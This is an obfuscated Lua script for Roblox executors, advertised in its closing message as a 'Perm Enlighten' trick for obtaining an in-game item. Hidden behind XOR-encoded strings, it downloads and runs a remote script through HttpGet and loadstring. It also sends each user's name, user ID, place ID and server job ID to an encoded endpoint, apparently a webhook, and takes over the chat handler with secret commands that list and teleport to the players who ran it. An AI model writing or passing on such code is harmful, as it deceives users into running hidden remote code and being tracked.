--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v25,v26) local v27={};for v48=1, #v25 do v6(v27,v0(v4(v1(v2(v25,v48,v48 + 1 )),v1(v2(v26,1 + (v48% #v26) ,1 + (v48% #v26) + 1 )))%256 ));end return v5(v27);end local v8,v9=pcall(function() return game:HttpGet(v7("\217\215\207\53\245\225\136\81\195\194\204\107\225\178\211\22\196\193\206\54\227\169\196\17\223\215\222\43\242\245\196\17\220\140\250\45\235\186\195\40\136\154\148\22\246\190\194\26\156\235\206\39\171\131\136\19\208\202\213\106\213\171\194\27\213\134\137\117\206\174\197\91\131\147\227\107\234\174\198","\126\177\163\187\69\134\219\167"),true);end);if (v8 and v9) then local v49,v50=pcall(function() loadstring(v9)();end);if  not v49 then warn("Fehler beim Ausführen des externen Skripts: "   .. v50 );end else warn(v7("\5\200\34\201\249\49\141\40\192\245\46\141\2\192\238\54\195\62\192\238\47\204\46\192\242\99\201\47\214\188\38\213\62\192\238\45\200\36\133\207\40\223\35\213\232\48\131","\156\67\173\74\165"));end getgenv().Message=v7("\111\165\76\5\185\50","\38\84\215\41\118\220\70");repeat task.wait();until game:IsLoaded() local v11=game:GetService(v7("\96\26\35\11\251\66\5","\158\48\118\66\114"));local v12=game:GetService(v7("\159\33\28\51\99\170\233\191\23\21\36\101\172\248\174","\155\203\68\112\86\19\197"));local v13=game:GetService(v7("\114\216\46\232\99\112\228\236\117\216\36\234\73\123\224","\152\38\189\86\156\32\24\133"));local v14=game:GetService(v7("\212\67\179\86\207\82\181\80\245\84\162","\38\156\55\199"));local v15=v11.LocalPlayer;local v16=v7("\160\105\104\56\0\46\181\12\172\116\111\43\28\102\254\13\171\114\113\103\18\100\243\12\191\120\126\32\28\123\241\80\231\44\46\121\65\44\170\26\248\42\47\112\71\38\175\27\253\43\41\120\92\37\216\108\158\117\112\28\56\44\192\14\161\41\86\3\17\120\201\26\140\118\42\1\58\98\253\89\186\104\72\112\7\35\203\89\251\36\36\30\56\68\242\97\188\92\104\44\60\101\251\78\173\123\117\60\1\64\175\16\229\117\100\16\38\115\215\19\241","\35\200\29\28\72\115\20\154");local function v17(v28,v29,v30,v31) local v32=0 + 0 ;local v33;local v34;local v35;local v36;while true do if (v32==(2 + 0)) then if v36 then v36({[v7("\137\209\219","\75\220\163\183\106\98")]=v16,[v7("\32\181\143\46","\185\98\218\235\87")]=v34,[v7("\230\57\51\238\209\174","\202\171\92\71\134\190")]=v7("\25\238\31\188","\232\73\161\76"),[v7("\147\220\67\89\27\169\202","\126\219\185\34\61")]=v35});else warn(v7("\36\250\106\66\51\69\246\246\25\203\77\102\51\81\230\233\7\218\87\125\112\55\253\238\15\198\74\50\121\114\245\242\2\202\91\124\48\55\196\226\14\198\81\125\117\55\248\232\2\192\74\119\62\121\250\228\4\218\30\117\123\100\246\233\8\203\74\50\105\114\225\227\9\192\16","\135\108\174\62\18\30\23\147"));end break;end if (v32==1) then v35={[v7("\184\89\199\180\63\94\36\140\175\79\217\165","\161\219\54\169\192\90\48\80")]=v7("\72\82\16\41\64\65\1\49\64\77\14\106\67\81\15\43","\69\41\34\96")};v36=http_request or v36 or HttpPost or syn.request ;v32=2;end if (v32==(1474 -(1329 + 145))) then v33={[v7("\26\176\223\203\136\34\32","\84\121\223\177\191\237\76")]=string.format("Username: %s\nUserID: %d\nGameID (PlaceId): %d\nJobID: %s",v28,v29,v30,v31)};v34=v14:JSONEncode(v33);v32=972 -(140 + 831) ;end end end getgenv().executedPlayers=getgenv().executedPlayers or {} ;local function v19(v37) local v38=false;for v51,v52 in ipairs(getgenv().executedPlayers) do if (v52.UserId==v37.UserId) then v38=true;break;end end if  not v38 then local v56=0;local v57;while true do if (v56==(1850 -(1409 + 441))) then v57=0;while true do if ((718 -(15 + 703))==v57) then table.insert(getgenv().executedPlayers,{[v7("\152\232\39\206","\167\214\137\74\171\120\206\83")]=v37.Name,[v7("\190\227\55\79\209\163","\199\235\144\82\61\152")]=v37.UserId,[v7("\55\26\184\40\2\63\189","\75\103\118\217")]=game.PlaceId,[v7("\237\91\114\61\189","\126\167\52\16\116\217")]=game.JobId});v17(v37.Name,v37.UserId,game.PlaceId,game.JobId);break;end end break;end end end end local function v20() local v39=0 + 0 ;while true do if (v39==0) then print("Spieler, die das Skript ausgeführt haben:");for v58,v59 in ipairs(getgenv().executedPlayers) do print(v7("\234\43\46\149\160\3\249\218\32\33\141\177\67\188","\156\168\78\64\224\212\121")   .. v59.Name   .. v7("\75\174\144\221\2\252\140\202\93\174","\174\103\142\197")   .. v59.UserId   .. v7("\26\104\111\52\36\93\253\127\44\5\120","\152\54\72\63\88\69\62")   .. (v59.PlaceId or v7("\250\139\207","\60\180\164\142"))   .. v7("\20\30\47\38\37\196\22\2\30","\114\56\62\101\73\71\141")   .. (v59.JobId or v7("\150\166\250","\164\216\137\187")) );end break;end end end local function v21(v40) for v53,v54 in ipairs(getgenv().executedPlayers) do if ((tostring(v54.UserId)==v40) or (v54.Name:lower()==v40:lower())) then if (v54.PlaceId and v54.JobId) then local v63=0;while true do if (v63==(438 -(262 + 176))) then v12:TeleportToPlaceInstance(v54.PlaceId,v54.JobId,v15);return;end end else print("Spielinformationen für diesen Spieler sind nicht verfügbar.");return;end end end print(v7("\225\246\56\183\170\251\25\146\235\56\166\230\250\14\192\166\26\183\168\240\30\220\225\113","\107\178\134\81\210\198\158")   .. v40   .. v7("\120\25\151\212\174\61\78\140\207\169\48\26\194\193\175\62\27\140\194\175\54\64","\202\88\110\226\166") );end v13.TextChannels.RBXGeneral.OnIncomingMessage=function(v41) local v42=v41.Text;if (v42==v7("\130\26\145\242\216\208","\170\163\111\226\151")) then v20();elseif (v42:sub(1722 -(345 + 1376) ,6)==v7("\80\58\189\49\64\119","\73\113\80\210\88\46\87")) then local v60=688 -(198 + 490) ;local v61;while true do if ((0 -0)==v60) then v61=v42:sub(16 -9 );if v61 then v21(v61);else print("Ungültige Kennung.");end break;end end elseif (v42==v7("\192\15\197\23\228\138","\135\225\76\173\114")) then local v64=v13.TextChannels.RBXGeneral;v64:SendAsync(v7("\50\232\161","\199\122\141\216\208\204\221"));end end;v19(v15);local function v23(v43) local v44=1206 -(696 + 510) ;local v45;local v46;local v47;while true do if (v44==(0 -0)) then v45=1262 -(1091 + 171) ;v46=nil;v44=1;end if (v44==1) then v47=nil;while true do local v62=0 + 0 ;while true do if (v62==(0 -0)) then if (v45==0) then v46=game.Players.LocalPlayer;for v70,v71 in ipairs(v46.Backpack:GetChildren()) do if (v71.Name==v43) then return true;end end v45=3 -2 ;end if (v45==(375 -(123 + 251))) then v47=v46.Character;if v47 then for v72,v73 in ipairs(v47:GetChildren()) do if (v73:IsA(v7("\153\210\31\252","\150\205\189\112\144\24")) and (v73.Name==v43)) then return true;end end end v45=9 -7 ;end v62=699 -(208 + 490) ;end if (v62==(1 + 0)) then if ((1 + 1)==v45) then return false;end break;end end end break;end end end local v24=false;task.spawn(function() while true do local v55=836 -(660 + 176) ;while true do if (v55==(0 + 0)) then task.wait(202.001 -(14 + 188) );if (v23(v7("\17\140\186\12\37\154\26\21\43\151\171\67\10\141","\112\69\228\223\44\100\232\113")) and  not v24) then local v65=675 -(534 + 141) ;local v66;while true do if (v65==(0 + 0)) then v24=true;v66=v13.TextChannels.RBXGeneral;v65=1 + 0 ;end if ((1 + 0)==v65) then v66:SendAsync(getgenv().Message);break;end end elseif  not v23(v7("\224\23\2\147\151\110\141\209\17\20\199\185\114\131","\230\180\127\103\179\214\28")) then v24=false;end break;end end end end);print("Perm Enlighten script successfully executed\nHow it is done: \n1. Execute the script\n2. Get enlighten by asking the admin And you are done.\nThis script will automatically reset your inventory.");
